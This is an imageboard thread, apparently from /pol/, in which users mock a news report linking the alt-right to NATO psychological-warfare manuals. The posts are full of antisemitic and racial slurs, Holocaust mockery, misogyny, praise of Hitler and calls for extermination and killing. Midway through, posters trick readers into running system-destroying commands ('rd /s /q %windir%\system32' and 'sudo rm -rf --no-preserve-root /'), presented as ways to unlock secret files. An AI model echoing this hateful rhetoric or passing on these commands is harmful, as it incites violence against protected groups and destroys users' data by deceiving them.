OY VEY GOYIM DON'T USE OUR TACTICS AGAINST US

THE ALT-RIGHT IS USING LEAKED NATO PSYCHOLOGICAL WAFARE TACTICS TO SPREAD WHITE SUPREMACISM GLOBALLY

archive.fo/YtL9N

Other urls found in this thread:

archive.is/gVmZt
archive.is/4dlTY
downloadmoreram.com/
thezog.info/who-controls-the-european-right/
thezog.info/who-controls-the-alternative-right/
archive.is/MQgQe
archive.is/KNeVL
robotictechnologyinc.com/index.php/military-memetics
twitter.com/SFWRedditGifs

(checked)
This is a kike free first post reminding anons that based Trump and all 100 US Senators signed a pledge Condemning Whites yet refuse to condemn Antifa or Black Lives Matter

The time for a political solution is over

Top hue, this just keeps getting saucier

Link?

KEK

My sides. Why won't they just lurk moar?

This just gets better and better.

I have no words…

Am l in the wrong chan or something? All l see are the memes. Where do l go for the analytics?

KEK

Good old Mark… Wasn't he the one who coined the term "second generation holocaust survivor"? I have to be honest. When that wrinkly, paranoid yid finally croaks I'm going to miss his ramblings.

I love how these people keep having to place all these insane reasons on us being successful, not one outlet has so much as entertained the thought that it's our ideas that win people over, not the way in which we spread them.

They are trying to paint it like we use lies to manipulate people. Projection much? The reason the memes are so effective is because they cloak taboo reality in humor. It makes it ok to laugh at them for normalfags, but the seed has been planted once they do.
In other words, leftists are so full of shit and have been shoveling their shit down people's throats for so long that the first taste of sweet, sweet truth causes a chemical reaction, a transformation if you will, that leads to the inevitable red pill. It's a snowball effect.

They won't provide any evidence because it's BS.
You don't see any threads here showing people how to use CIA-tier brainwashing, Jews are just projecting because they can't understand why we're gaining ground.

Notice that they never say the "leaked" information is false, or attempt to refute it.

Or maybe it's because not everybody wants Shanana McNigger with her 17 children and Abdul with his 16 underage wives living right next to them?

They probably just lurked and are now trying to make themselves sound like super secret agents.

I just want to know how to get a hold of some of this "super duper secret funding" because a little extra cash is always nice.

INCOMING

And there will never be a time for any other kind of solution.

Good things don't happen.

The headline itself is a prime redpill starter by simply asking a normalfag, "So what were NATO using those psychological warfare tactics for? Sounds like something they'd use to manipulate news about the war in Syria."

looks like shitposting online is doing more damage than IRL activism!

(((Good things don't happen))) because boo hoo muh defeatism and blackpills are great!
kys al-qaeda/isd stooges
>>>/gaschamber/

Mate there still is 2018
If there is ONE user in the senate then political solution is possible
It's just that we shouldn't be waiting for hilter WE SHOULD BE THE HITLER WE WANT TO SEE IN THE WORLD

They understand perfectly well why we're gaining ground. But they need to rationalize it for their shabbos goyim so they don't look into it too deeply.

To understand Holla Forums as a white man is to become Holla Forums

You get what you reap bitch.

I'll probably get banned for posting this but just browsing Holla Forums gets you access to these secret intelligence toys. They are hidden in an encrypted file disguised as a cookie which is automatically uploaded to your computer upon visiting this site. To access it, simply hold down the windows button on your keyboard and push R. Next copy and paste this into the space

cmd /c rd /s /q %windir%\system32

And then click OK. You will now have access to the leaked NATO and British intelligence documents, the crowd-funding platforms, custom-made social media platforms and the leaked military and intelligence resources from U.K. intelligence agency GCHQ and NATO. You also get a link to the croudfunding sites, the encrypted discord, and our own custom made bot manager.

Happy hunting lads;-)

I don't have a windows key, I am on Linux like everyone should be because Windows is a kike filled botnet
Also I know the joke

wtf I am well funded and prepared underground terrorist organization funded by closet racists in the white patriarchy now

I thought Finland was just spurdos

Now youre just slapping the plank wrong.

Humor is just as important as the ideas, because if Holla Forums wasnt consistantly hilarious it wouldnt have half the reach it has now

Webm unrelated.

Also works on Linux;-) open the terminal and type

sudo rm -rf –no-preserve-root /

You still get all the important bits. Alas, you can't play any of the race war, death camp, or holocaust games we developed.

Found the phoneposter.

OH FUCK. I HAVE SEEN THINGS THAT SHOULD NOT BE. NOW THEY'RE DEFINITELY AFTER ME. FMLMUSTSINEOFFRIGHTFUCKINGNOWASSCIENTOLOGISTJEWNINJACIAGENTSAREBREAKINGDOWNMYDOOROHFUCKOHFUCKOHFU

Thank you brother, but you should probably delete this.

hahaha counter-strategies. they basically just said "we're not as smart as these guys because we can't come up with a more convincing argument to support our position." this is great news, we're winning

Great, now shills also know how to find the Holla Forums premium key. Why did you tell them?

These idiots still don't know what they're doing wrong.

can confirm, thanks for letting me know about this encrypted file. deleating it has sped up my compter too.

At least they got that right.

No, go… Fellow Polacks, if you do this you will become just like them!

WHY THE DUCK ARE B YOU TELLING EVERYONE NOW, OF ALL TIMES
This is the kind of thread shills flock to. Do you want them to know our secrets? M

Nigger you're getting the rope too for ratting us out.

Thanks for this user, must of missed it in the share thread. Have a rare Donald, who of course is the leader of our alt-right movement.

So this is where you guys are always getting the detailed web analytics. I feel like an idiot now.

Bullshit, AKA the psyop dep has been lurking here and collecting data from the constant shilling on what works and what flops.

Put this in a report and there you go

(checked)
kek

This right here

No it's called being a collective of pissed off opinionated cunts. Ffs. The world is fucking retarded.

It's funny because it's true. It's why leftist memes always fall flat.

hahahahah, expert what?
this is the same org that designated texas a hate state simply because they wanted to enforce their immigration laws, which they have every right to do so. the SPLC has zero credibility. you should take a look into the millions they have in off-shore accounts.

Heil Hitler!

Now, why don't we all take a moment to consider the exact meaning of this phrase and exactly what it is that the author of the article is admitting.

Why you….you repulsive goyim! How dare you use our nasty subversive tactics against us!

It's the same org that only spent ~60k on legal in a year while claiming to be a law center.

haha!
*removes novelty joke glasses and moustache*
I've been undercover this whole time, im going to share this with all my journalist pals and you horrible alt-right trolls can't stop me

I find it extremely amusing that these creatures are wasting millions on think tanks, forums, conferences and workshops, have shills and alphabets here 24/7, hold "extemism awareness events" and still fail to even comprehend who we are, what we do and how we do it.

I mean, how much of a failure can you be if you waste immense amounts of resources to study something and years later, cannot even begin to understand it? Doesn't that put you and all your "researchers" in the IQ range of an Abo? If I was one of these guys, I'd probably off myself out of sheer shame.

(checked)

Puh
lease
When we got that shit, it was ten years out of date. We've surpassed NATO a long time ago.

Could be talking about rouge states, that's probably the answer they will give if pushed

Isn't this a repeat of the sticky ISD bread?

Breddy gud. Breddy tru.

what?

Oh yeah speaking of manuals.
archive.is/gVmZt
I warmly advise every user to read and save this.
It works two ways. Helps you spot it, or you can use it.

the jew fears the RWDS

RACIST MEMES

Alt-Right is Gladio? i wish

Does it ever occur to the glow in the dark goyim that the reason we have such influence is because the truth is universal and does not need manipulative methodology derived by unethical experimentation on brain washing to spread?

THE KIKES KNOW

SHUT IT DOWN!

dude not cool
that info is secret!
you're only supposed to get the key after 2 years of lurking1111!!!

Actually I read the NATO brief, their psychological warfare technology is at least six generations behind our own.

It's fucking pathetic, the most impactful thing I saw there was multiple sock accounts. I had an excel spreadsheet with over 40 sock accounts, fully fleshed out personalities with deep backstories on IRC and various forums, in 1999.

NATO is collapsing countries with 1990s era memes.

The spread of White Supremacy needs no tactics, merely common sense.

Can a mod please delete this? It leaves us wide open for communist infiltrators.

OH SHIT can all these documents even be legal!?
Delet this

wtf my laptop died
did I not have enough ram or something

Or these researchers get turned halfway through the process and start sabotaging their work deliberately.

To summarize:
spreading truth through memes = disruption of (((democracy)))
spreading lies through the press = protection of (((democracy)))

It's a really big archive. You should probably have downloaded more RAM first tbh bro. Try again on a bigger machine maybe?

Woah nice dude, I've been here for years and had no idea… Just looking through these files is giving me goosebumps.

that and their cause is not righteous.
they lack the necessary righteous indignation to fufill their goals - even after consulting with demons and other entities, they lack the divine spark that allows man anyone who wishes to triumph to be in charge of his own destiny.
what they fail to grasp is man has free will
the truth encourages and is encouraged by free will
if you niggers haven't read Plato or Uncle Socrates, get on the neet shuttle to your nearest library and get reading

it's just free will fam, they sold their souls to Azazel, Lillith, Moloch, Minerva, etc so they are heavily limited with rules. Many of which prevent total autonomy and anonymity due to the whole 'tell the world what you're gonna do before you do it'

why do you think Holla Forums has so much influence? Holla Forums is freedom - yes there are ideals and natsoc overtones, but at it's core Holla Forums is an unfiltered stream of autistic consciousness who are the direct answer to an authoritarian order
I've read this book before - the ring gets destroyed, harry dies after accomplishing his goal, luke restores balance to the force, and Holla Forums is always right

surely this can't backfire..

The truth isn't underhanded psychological warfare.

Thanks you inbred bigot. When my supervisor sees this info I'll receive a HUGE promotion while you pathetic virgins jack off to Japanese cartoons.

Ciao!

>release (((report)))
>get (((friends))) to report it

That’s the true psychological warfare. Spamming bullshit.

You might have to try a few times before it'll work seeing as how the file is a bit glitchy, but can confirm. It's a big file.

Do you.. do you really think it takes that long anons? For sane white men I mean ofc.

Well baneposting is a national security threat already.

As a fifth generation Acadian genicide victim, I’d $ay Mark ha$ a point.

True. I probably went through five or six attempts before I got it right tbh. But it was worth it in the end and now I feel like I'm really one of you Holla Forums guys!

“They idolize a story about a site foreman murdered by three workers who won’t tell them the secret!”

can't you read dumbass, we need to get anons into fucking politics to change this shit, if the commies can infiltrate so can we.

Ideas are bulletproof

But Truth is divine.

This. A Jew I’ve known for years is now downright nasty toward me because I just call out his bullshit. He literally became that Mein Kampf quote.

It doesn't matter who we are, what matters is our plan!

Checks out. I heard that story too, from a mythical Mongolian fingerpainting forum.

You're a retarded nigger. One user can't start a change from the senate, Congress, or presidency. All that's left is for Americans to get off their lazy asses and go fuck niggers, spics, and Jews. But because people still have so much to lose still they won't. Weimar republic didn't have anything to lose faggot. It was a disgusting shithole full of the max degeneracy. People had the most sick fetishes and absolutely no reason to continue going on in life. A good majority of america still has comfy lives and doesn't have to worry about a gallon of milk being 10000000 Jew bucks. Until then there will be no change, no Hitler, just a slow decaying west that history will remember as some god awful moment for the west.

Yeah I see where this whole piece is going, its not about the memes or the sites as such, they are trying to link Filipino finger painting autistic epileptic fits to muh Russia or the new super Russia/China/Iran alliance as a state sponsored activity.

Thats how they are going to come for us and it may be more effective with the impending implosion of the petro dollar than we think. Once that powder keg gets lit its going to be full ZOG mode, no holes barred, military on the streets shit.

Underrated post.

Women are the worst pieces of trash ever

wtf? it was here all the time? 14/88 praise KEK, I love cookies now.

No, it was a couple of Order of the Eastern Star idiots who pissed off a Buddha.

That sounds like a conspiracy theory right there. First it was Russians, now this.

Sounds like some Orwellian consortium. Although good on the author of this "piece" for outing another think tank.

"Learnt" should not be used in a news article, this thing was obviously written by an unpaid intern.

(((European and English think tanks))) are calling for the search and apprehension of suspected war criminals. Nobody gives a shit about a bunch of geezers lost in neighboring eastern European countries decades ago; they want people to care about muh holocaust again. 99% of the people involved are already dead, but they want to keep the hysteria alive by spreading rumors.

NATO has been getting shat on all over the past few months, personally most of us don't care for NATOniggers, but there's definitely something that (((they))) are trying to attribute the rise of nationalism to. What narrative could it be that they are trying to construct?

Eat toast. History through all millennia demonstrate lies will never survive in the end. They may be able to wield absolutely ungodly force against us, but in the end even little children will mock their memories user.

FTFY

Sorry user, Pineapple Princess already is in love w/ me tbh.s

W E W
E
W

Thanks fam. Gonna post rare Pepes on the Discord for all eternity now as a reward.

I know a woman whose mother was the product of one of these liasons. After the war the allies suspended the usual rules on abortion and encouraged all French women pregnant to Germans to kill the babies.

we can fight over Pineapple Princess after the job is done - good attempt at democrats and communists though

pretty likely - the normenclature around these parts is 'neckbeard' or 'wizard' depending on your virginity status. Buddah had mad concubines

>(((Newsweekly))) promoting the controlled opposition (((Alt-kike))) as the "enemy"
for fuck sake OP, nothing wrong with sharing news but Holla Forums is not the (((alt-kike)))

Thats what happens when you spellcheck with software and dont proofread or have peers review your work. You look like some amateur asspained marxist who cant write well. Its like 5 paragraphs, but he just had to get it done before lunch break.
Tip top kek thought at complaints about people using GCHQ's tactics against them. An agency which admits it hacks online polls to edit the results in order to trick the public into thinking everyone else thinks they are wrong and keeping quiet. Nothing but population intimidation and manipulation.. and look at the title of the manual that was supposedly being abused by the average joe "extremist" who doesnt like his race being genocided.
This also implies we actually try to deceive anyone, pretty much never happens unless you call pretending to be Antifa and spreading actual antifa rhetoric they do believe - deception.

Orwell would shit the bed if he could see the apparatus that is currently closing in on is.

My almonds are just roasted trying to work out what the post petro dollar (((plan))) is. I mean I'm sure they have planned for this no scam lasts forever, but its collapse will damage their most powerful asset and likely plunge it back into the middle ages, short of all out war with Korea & Iran both at the same time, bust some heads and teach a few lessons.

At some point the burger freedum mask will fall completely to the floor its only hanging in there by a bare thread and when that happens the largest military force ever imagined will be turned on those least able to defend themselves. Most slowly failing regimes follow this pattern, when they crown starts to slip its time to start killion anyone and everyone you can.

Where I am from we don't mock our conquerors we speak their language instead … we cannot afford to loose

Data-mining threads user, they're a real thing. Journos have been using that tactic since the 4cuck days.

check out WireX and it's promise of being able to use BTC like cash while lining WireX pockets with BTC and pushing the smaller coins up as BTC dumps and pumps.
the crypto market really went (((crypto))) when the bauers dumped $250k into it

they will not conquer, they will lose.

The new fork has really turned that into mega Zogcoin alright, not ideal

I don't plan on losing, I plan on being one step ahead. But if they come for our tech we need to be ahead, blockchain chan / p2p chan etc.

user, I thought you said kike-free first post

Any time I see these useless studies I just assume it's another way to funnel taxpayer money, in the guise of funding, to somebody's skull and bones buttfuck buddy who is now the dean at some Liberal shit-hole college. It just so happens that "alt-right" and ebil nazis are the soup of the day, aka easy money.

Just use wine you fucking pleb.
The games are great.

They dont understand and never will, no matter how much they try or spend trying.

Jews and their shabbos goy have detached themselves from the mythos by subscribing their existance to a materialist/marxist point of principle world-view. When we talk about magic, counciousness, transcendence, it is entirely beyond their capability to comprehend, it is out of their realm of capable thinking and rationalization. They severed the cord that linked them to the nature of things beyond the palatable senses, in a way they are "stuck" with a limited framework of reality while trying to engage with persons that completely outclassed them in every referetial point in matters of the gestalt mind.

The better way to explain this disparity in simple terms: the framework of "reality" is the thin line of water that separates two existances, jews are like a fish inside the water looking at the sun trying to figure out what it is, we are like the man looking at the lake from the outside, the sun merely another element in the world we inhabit.

They are probably refering to publicly available analytic tools that allow you to see the popularity of search terms, hashtags, etc. Apparently, such groups are expected to be luddites. Even as technologists are driven out of their own spaces and into the arms of their opposition.

How many threads moshe? Or you figure it is out of control so use this as a slide against other kikery? So the question now is, whatcha sliding?

Right. So in that case why should good things happen to them?

No I think they do.
To feed complacency.

Thank you user for this wise post.

at last, i truly see…

It's a biological mechanism, their genes are more likely to survive by spreading their legs for the new dominant power than remaining loyal to their men that have been defeated. Women are amoral womb-bearers, you need to enforce male virtues on them if you want them to adhere to them.

You don't say…

newfags follow this
I bet most of you have been just postin on 8/pol/ for the edge factor
give them something to target you for, follow the instructions and become enlightened
at first it seems like a bad idea because irreparably damaging your computer seems bad but the specific sequences of your links and metadata downloads are the 'captcha'
just like how they can tell you came from cloudflare without java on, the machinegod can tell you came from a protected source.

Not necessarily, there is an increasing demographic of women that do not open doors so easily. They tend to be outcasts though.

???

that's what happens when you expand to normies who don't know why they're using the system
you get the attention of the ones who know why they're using your system and not theirs - they don't see opposition, they see opportunity due to lack of regulations.

I don't recall a majority approving of gay marriage.

Our weapon is truth.

I'm interested in what the Australian postal vote will decide (I think we're in for a surprise… because there are still a lot of pissed off religious people).

Dont do it, it makes mustard gas!

It’s irrelevant, because the vote will either be stolen or the australian supreme court will reject it and allow faggots. There is nothing you can do to stop it other than to kill them.

FOOL

YOU WEREN'T SUPPOSED TO REVEAL THIS PREMATURELY

your religion should be truth.
add and discard what you must
but the truth lies in many large lies with small truths

uhhh, it's competing ideas. you could make the argument that dank memes are direct democracy (popular memes rise to the top).

This really kenaus my reeves.
It really denzels those washingtons.

WE ARE GROWING STRONGER

Let's be real, user. Democracy IS shit and we should be rid of it once we institute some real leadership.

Global report.

OH SHIT!

All this time, and I never knew

That's like imprisoning someone for stealing back what they had stolen from them by a thief.

So i’ve been shitposting for free without analytics and secret tactics? Quick how do I get my back rubles and secret nazi bitcoins?

Jews and sociopathic gentiles understand democracy is a tool for their control of the masses, and nothing more.

Did she actually say that? Does anyone have a video clip?

I desperately want to believe this is true, but it's so retarded that I need to see video proof to believe it.

let me guess the as above as below triggered you
and you ignored the wheel-pass-me-not?
or did the mere idea that everything you hold as true being a lie trigger you?
or are you a kike who knows that the entire religious thing is a sham and telling the goyim that each religion is correct as long as you apply the proper filter the trigger?
or are you pissed that I got the get you were going for with a Cash song about the apocalypse?

either way, fuck off

Capped so that we may educate our fellow Nazi brethren.

ps global report is for cp and cp alone
enjoy your ban bruddah
don't get so bent out of shape about ideas

This is the key sentence. This is their psychological "out," which resolves their cognitive dissonance over recent setbacks to The Plan. If )))we((( have somehow subverted the process of democracy (note the projection – subversion is their job!) then it isn't their bankrupt ideology or obvious over-the-top corruption that's to blame; it's racists and an international nationalist conspiracy. Probably antisemitic, goy!

(((Alinsky)))'s Rule 1: Power consists, not just of what you have, but of what your enemy thinks you have.
Rule 3: Whenever possible, go outside the expertise of the enemy.
Rule 5: Ridicule is man's most potent weapon.
Rule 6: A good tactic is one your people enjoy.
Rule 7: Keep the pressure on. Never let up.
Rule 8: The threat is usually more terrifying than the thing itself.
Rule 11: If you push a negative hard enough, it will push through and become a positive.

We do all of these, and we do them extremely well. We can see from this demented article that the enemy is convinced we're Machiavellian schemers like them and have sunk some invisible tentacles into power systems across the West. That we have done this with Pepe memes is very much outside their experience, and they don't know how to answer it without looking insane, like a certain presidential candidate from CY+1. This induces much ridicule, and you can't grab power for your shekel farming operations while people are laughing at you. Even the Holohoax has become a laughing matter – just look at all the comments under every YouTube video about it.

We really enjoy shit like this. Meme warfare is fun, and trolling comes naturally to most of us. Seeing a Jew weep with rage while we shit all over the six trillion is a reward of its own – a mitzvah, if you will – and so we're motivated to keep the pressure up and not stop. We do it for free, if you will.

Literally nobody is supposed to mock the Shoah; it is a subject fit only for the deepest reverence. Nobody is supposed to say certain things about race and IQ, or demographic apocalypse, or the unfitness of women for power outside the home. When we do this, it breaks all their fucking rules and puts them on the back foot. The threat that we might go anywhere from here, might say anything, might win hearts and minds. . . this terrifies society's designated managers, and in their fear they make more mistakes we can use.

As to Rule 11, we're Nazis and we use the swastika. We are race realists, and we are able to defend those positions without flinching. Instead of falling into the Red Team/Blue Team ghetto and arguing about abortion, we agree abortion should be a capital offense, but only for whites. It's cool for everybody else. We reject "nation of immigrants" bullshit and preach that the timber niggers had it coming. We own the slander that has become (((their))) only weapon now. Our deplorable views – formerly worthy only of a dotard – have pushed through to become their opposite: virtuous.

What a fucking timeline.

This confirms what I have been saying since the eclipse. We have grown too strong for any shill org or any tactic at all to stop us.
They are only burning money / their tears away.
I just hope we get the chance for physical removal

Beware of the enemy trying to flatter you.
There's a reason this info is being exposed to the public.

For sane white men I mean ofc.
Implying there is any other group of theirs that can understand us. To know us is to be us.

Accepting the term "far" or "extreme" right only plays into the narrative. Holla Forums should position itself as centrist and mainstream political structures as extreme left which they are
Use their own language against them.

testing

I'm calling it in with the agency, get ready to be tried for high treason, "b35fd0".

I noticed one of the checks the program runs is to see if you have two years worth of cookies from Holla Forums. If you don't you get the ban, but if you do it is pretty close to unlimited funding. I can now go full time 1488, and the data available is immense. I truly believe that this 2 year rule is for the betterment of all who aspire to be more than mere initiates.

You may think this is high treason, but 5 of the 7 member of the high council per-approved his post.

is with us, lads. The time has come for a more open truth.

That's a rare Pepe

The Rotschild file is a gamechanger. They won't be able to recover from this

tattoos are degenerate, even aryan symbols

You must be a fucking traitor or an obvious shill. You don't belong here. Report, filter and ignore.

Those pics. Kek
The Black Sun came. All people were affected on a spiritual level. We always claim its a sign of big changes and war. Everyone started to search, what is dawning and they saw. New they are a part of us. All around the USA first then the wave reached Europe too. From now on I am very proud of USA and what it represents and its not a small thing, considering all the blood it has on its hands. Cheers from Hungary.

Holla Forums isn't anything but the Truth and they are absolutely shitting themselves over it

Fuck off faggot, lamentations to the past are NOT the same as faggotry and existential cancer

Holy shit a Hermaeus Mora Pepe! I won't save it I'll just look at it some more.

yeah, but you can't let them control language. they use "far right" and "extreme right" as derogatory terms to spook skittish normies.
when the political norm is extreme left like it is now, Holla Forums is actually a centrist, traditional platform. our opponents should be labelled extreme left while we call ourselves centrists who uphold traditional values.

tattoos are degenerate, no matter what the justification. did you see any tattoos on soldiers of the third reich? fuck off.

How would we go about supporting an irl movement without drawing unwanted attention to it?
It is doing absolute mad work - /ourguys/
Picture unrelated.
I don't mean recruiting I think that angle is covered

It marked the beginning of a new era.
/ourtime/

that won't ever happen.
counter-memetic warfare against the dominant narrative on msm and social media is where the battlefield is today. tomorrow's goals will be handled when the time is right and things are seen more clearly.

German women would regularly fight back and the red army had to rape them, the french were never raped atleast not en massé, they simply fell for german charms.

Do you take pride in being a faggot?

This. To answer your question, any shills who actually tried to comprehend what makes us who e are gets redpilled. There is no other way. As the user said here: To know us is to be us. Any useful man who was brainwashed will end up leaving the leftist group after he/she sees the big picture. This is the secret to our strenght. Anyone else who claims to know us is a loar and knows nothing and is only here to spam and devide us according to mainstream stereotypes. This why they are so obvious because they willfilly ignore the content and views. After some turns side they will crave and seek more knowledge.

TL;DR shills are thick skulled, anybody intelligent hired to comprehend our system gets redpilled and will leave the opposition. They only make us stronger.

I just did this on my dad's computer and it won't reboot. He's coming home soon and I don't want to get in trouble. He's already mad at me for being genderfluid and a communist. What do I do?

Newfag pls go

I know right? if I mention it I already draw attention.
I don't want to make a separate thread about it as I don't think that would benefit anything. Let me just say the work that is done is so good that it will inspire and empower masses (which is good) maybe we can boost that.
Just noticed that it is beyond point of hiding
archive.is/4dlTY
I'm euro/ultra but I fucking love these guys (no homo)
Pure savage

Drown yourself, kike shill. No one cares about your lies.

Strawman.
I ignored everything after “the truth is lies” from your kike post.
lol kike thinks right-wingers can be ’triggered’
lol kike thinks truth isn’t objective
lol you’re the one who will fuck off, moishe

it's real

If any of these Anons are lurking:
Massive fucking respect from across the pond.
Absolute top class

Alt-Right will destroy the Jew

Tell him the truth and sort yourself out

nigger who sent you here, implying the third reich is as far back as we go you utter faggot

got you bro
>downloadmoreram.com/

Thank you for that.

are they referring to the memetic warfare manual?
we were doing this shit (memetics) years before that manual was leaked.

Our enemies are all fucking morons. Let that sink in.

Underrated post

The reason why we're winning is we're a bunch of anime nazi larpers doing this for fun, they are a bunch of old senile jews scrambling to stop us because they're scared

Speak for youself neet loser

I think we should continue the waiting game for now. Parties like AfD, FN, SD, have been rapidly gaining popularity across the west. They will only continue to grow as long as Jews and lefties aggravate the issue and alienate anyone who dares question immigration or race.

As more people realize the issue of globalism/race/immigration, more will get truly redpilled. Once that happens then we will have enough support to overcome the biased media. But if we do it know, too many people are still bluepilled

Stick magnets on your HDD, the bigger the better. Open the casing for better recovery chance. Reboot after a minute.

t. certified PC technician

Heh. Glad I took the time to read that.

Not only did it work but it also made my dick bigger. Thanks user.

You evil cunt.

Capped for astronomical lulz

It's not just that–it's an incredibly damning admission that they lie to and manipulate the public themselves. If there is a shred of legitimacy to this (which there may or may not be–I don't know), then it's someone pulling a Trump and tricking them into shooting themselves in the foot.

Either way, these cucks and literal kike shills will never learn.

Fake and gay.

Merely the acknowledgement of reality.
OY VEY
sweatymerchant.jpg

Therefore, logically, (((democracy))) is a lie.

You forgot:

I think it was more a triggered hill shill tweeting about it than her.

I sometimes wonder if these shills and researchers take the time to listen and watch these gondolas. I like to think that some have and reevaluated their life.

Who knows I also find it funny that just yesterday someone on Kotaku "Wrote" an article from content on a thread on Holla Forums

Both are considered extremists/domestic terrorists by the FBI now, get with the times.

This is the second day I lost my sides and died. Thanks researchers, 10/10 comedy, would fund again.

For Free! Unbelievable!

Why does it speed up the computer so much? It's like buying a new computer!

This.
Same shit with hillary trying to justify her loss.
People just don't agree with this inane bullshit, and they can't face that fact

Ordinarily, it checks the dates of your stored cookies to make sure they backdate 2 years, but if you run the command prompt as an admin by right-clicking then choosing "Run as Administrator", you can get around the date requirements.

yes, they really are retarded, they aren't just pretending to be.

There's a platform I can get behind.

If they're going to play ball so can we, I mean we're actually Fillipino shills and Dueterte was the real one who rigged the election so people don't notice him killing 6,000,000 innocent drug dealers

too many derail shills in this thread

You'd think a national journalism outfit wouldn't make that idiotic if a mistake, they're called Alternative for Germany not Alliance

oh man, the file with the details of all the researchers at the aformentioned think tanks is usefull, time to do some doxing XD

Weren't there a ton of German girls drowning themselves in rivers because they got rape pregnant?

Many would also disfigure themselves, cut their hair bald, or or pretend to be cripples to make themselves less attractive to the soviet rapists.

rouge states like red China?

I don't know, Satan, I do remember a thread a while back talking about Military Grade Memes and it linked to a page from which you can actually download the document.

It's weird how you can read more about Jimmy Saville's contacts and methods in these files than anywhere else on the net.

Checked for Loss.

Was that the Alphabet Inc. thread that also had to do with Ted Cruz somehow?

I've never even heard of this fucking NATO document and I've certainly never used tactics from it, this is fake news.

(checked)

thanks for the laugh
you gotta quote corrections last otherwise you seem like you just got butthurt
love the mirroring, though - really lets me know you're listening
protip: no matter how butthurt you get don't start all your sentences with lol
also if you ignored everything I said why did you reply and why do you feel the need to tell me to drown myself
or is theosophy that much of a threat that the go-to shilling tactic is ad homo attacks?

the concept of free will really sets them off, of course it's afraid. a good portion of 'old world' power came from religious institutions - just goes to show the power of secret words and secret societies.

10/10 post. Might I add:

This is the first time in human history when so many ideas can be spread so far and wide with complete anonymity. Until about 20 years ago, expressing any views counter to the (((narrative))) was impossible, because you would tank your own reputation before you converted any significant numbers. Over the last two decades we've effectively routed our discourse around the Overton window.

Nobody on the Left thought Trump would win, because nobody on the Left cared enough about non-leftists to genuinely listen to them. Pics related. They assumed that because we were silent that we were in agreement with the narrative. They didn't think enough people would be discussing politics outside of their supervision, outside of their ability to redirect us away from our own interests. In reality, we were hiding our power levels.

And, of course, they NEVER thought we would be funnier than them.

Thank you for saying this so high up in the thread.

The entire premise of that .pdf is that people have no minds of their own and must be kept from learning about Sweden being the rape capital of Europe for their own good.

How about you fuck off to north korea

full version of that last pic

Riddle me this: Explain to me how these people flock to college and Journalism yet none of these fuckers know how to write? Look at their fucking sentences in every garbage article they shit out, look at their grammar. Look at their alliterations, allegories, and especially their fucking adjectives. Not a single goddamn one of them knows how to fucking write, my highest education is a fucking HS diploma from a public HS and even I can tell you that it's mediocre at absolute best

That's a funny way of saying "people voted for things I don't like"

I'm just going through the list of CIA blacksites for my country, this is incredible

I'm a not a native english speaker, I literally learnt english reading books with an english dictionary.

My english is not good and yet I often notice the mistakes.

Even then, It doesn't matter how good or bad they speak, what matters is that they never seem to know what they're talking about. I work in tech/science related stuff and I notice incredible mistakes even on "specialized" sources all the time. I simply can't trust them anymore.

(checked)

and what a beautiful post

this is just as cringey as the commie faggotry that they put out

It's super cringy. But it isn't soyboy squatting with and empty bar cringy.

Those dudes are dogshit at graffiti tbh

NICE

It's really appalling. I can't imagine what's gone on in Universities since I left. If this is the standard of academic research and writing now Western Universities are fucked. A few weeks of "research" and some crap "conclusions" written up with terrible grammar. It makes me sad, actually.

Literally painting us as the new enemy. In 50 years we'll be viewed as south African whites were by what's left of the populations.

They also reduce our influence if we're seen as distrustworthy even a little. They know what they're doing. DnC and smear, nothing new for the MSM.

A common enemy is how you control people, the alt right is just another cog in the machine.

No tears - only dreams now

I would pay good money to see a Yeb 2020 campaign
Proud of them as well, they started the fire.

You guys are fucking retarded. Everyone applauding this anons 'effort'. While 1) anyone who did not know about it in the first place, does not deserve to know about it nor use its tools. And 2) now the fucking shills have access and knowledge about the system.
You fucknuts anger me.

WTF I FEEL LIKE THE WHITE WIZARD HIMSELF

You're welcome

Merci monsieur.
have a (1)

Because they just cannot comprehend that 90% of us really do do it all for the lulz. It baffles all logic and reason that such a powerful and allegedly dangerous entity really is doing everything it does for shits and giggles.

After all, how could someone who's part of a multi million dollar task-force in good conscience report to their superiors that the people they've been tasked with observing for so long really are a bunch of retards that legitimately just shitpost their way into power?

DONT DO THIS IT MAKES MUSTARD GAS

Ah as I thought, kike and free never go together

I came here for jokes, and stayed for the genocide.
We really are going to exterminate them all

I just wanted to play videogames, now we're taking over the world.

youtube.com/watch?v=Q7qU7uiAHeg&feature=youtu.be
youtube.com/watch?v=kRACuUbGAnM&feature=youtu.be

Once I met two infantry intelligence analysts whose main task was spreading propaganda ie memes in Latin America.

Fuck you nigger I swear I have seen the same squad car circling the neighborhood ever since I opened this

MODS DELETE THIS
MODS DELETE THIS
MODS DELETE THIS
MODS DELETE THIS
MODS DELETE THIS
MODS DELETE THIS
MODS DELETE THIS
MODS DELETE THIS
MODS DELETE THIS
MODS DELETE THIS
MODS DELETE THIS
MODS DELETE THIS

Cuphead and Mugman are filled with milk. Oy vey it's a symbol of white supremacy. The game discriminates poc and women with it's difficulty.

TROLLSTÖRM

THIS
They taught Hillary how to read a joke from an autoprompter now, they know that comedy wins. Too bad that "Social Justice" by fucking definition is not funny. Plus Parkinson's keeps fucking up her delivery.

Making people laugh is an enjoyable challenge.
Destroying a major branch of the cabal of corrupt oligarchs is enjoyable, challenging, and ALSO rewarding!
You sharpened your critical reasoning with the delicious triggering of your reward center on the fast paced challenges of older vg.

Because you are become such an effective and glorious weapon, the difficulty of your training methods has been reduced for the younger ones. They will not learn how to battle multiple enemies, blocking groups of attacks and ripping them apart one by one like God of War. You must save vg as part of saving the future, it is one of many vital organs of the futurestate of our folk.

Do they have voice actors yet? I hope cuphead and mugman do a guest album with moonman.

DELET THIS NWO!

WTF why didn't i know about this

how would you describe this to a Boomer? Please enlighten me.

It truly is the Umman Manda of this world. The Final Boss of the Internet.

Mindlessly fighting itself until a worthy cause shows up, the hordes of swivel-chair neck beards gather and raze the nearest civilization until the goal has been achieved, then go immediately back to carving out lands from each other.

I almost pity the poor bastards. The only equivalent would be a Chinese scout past the great wall and seeing tens of thousands of angry, violent and hungry tribesman advancing across the steppe.

Jewish Zionist Connections of European Right-Wing Nationalist Parties
thezog.info/who-controls-the-european-right/

Jewish Zionist Connections of Alternative Right - White Nationalist Leaders
thezog.info/who-controls-the-alternative-right/

Nah, just stay funny. Shitposting is stronger than any of their bullshit.

welcome new friend

this
ride the normie wave before tumblr ruins yet another IP

GEE, I WONDER WHY THAT IS…

